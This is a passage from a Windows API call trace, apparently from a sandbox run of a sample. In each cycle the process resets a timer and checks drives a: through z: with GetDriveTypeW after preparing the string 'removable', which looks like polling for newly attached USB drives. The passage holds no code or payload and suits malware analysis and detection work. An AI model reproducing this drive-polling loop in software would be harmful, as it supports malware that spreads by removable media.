Flags=0x0, Size=0x10) returned 0x14bd340 [0215.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.954] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0215.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0215.954] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0215.954] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.955] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.955] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.955] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0215.955] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0215.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0215.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0215.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.956] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.956] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.956] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.956] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.956] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.956] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.957] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.957] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.957] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.957] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.957] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.958] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.959] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.959] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.959] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.960] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.961] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.962] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.962] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.962] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.963] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326060 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326060 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0215.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0215.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0215.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.964] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.964] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.964] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0215.964] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.964] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0216.141] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0216.141] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.141] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0216.141] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0216.141] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0216.141] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0216.141] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0216.142] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.142] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0216.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.142] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.142] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.143] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.143] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.143] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.143] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.143] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.144] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.144] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.144] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.144] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.145] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.145] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.145] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.145] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.145] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.146] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.146] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.146] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.146] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.146] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.147] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.147] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.148] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.148] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.148] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.148] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0216.149] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.149] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0216.149] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0216.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0216.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.150] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e40 | out: hHeap=0x12c0000) returned 1 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0216.150] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0216.150] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.150] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0216.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0216.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0216.151] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0216.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0216.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.151] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0216.151] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0216.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0216.151] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0216.151] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0216.152] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0216.152] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0216.152] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0216.152] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0216.152] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0216.153] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0216.153] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0216.153] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0216.153] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0216.153] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0216.153] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0216.154] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0216.154] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0216.154] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0216.154] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0216.154] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0216.155] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0216.155] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0216.155] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0216.155] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0216.156] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0216.156] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0216.156] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0216.156] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0216.156] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0216.157] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0216.157] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0216.157] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0216.157] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0216.158] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0216.158] RtlAllocateHeap (HeapHandle=0x12c0000, 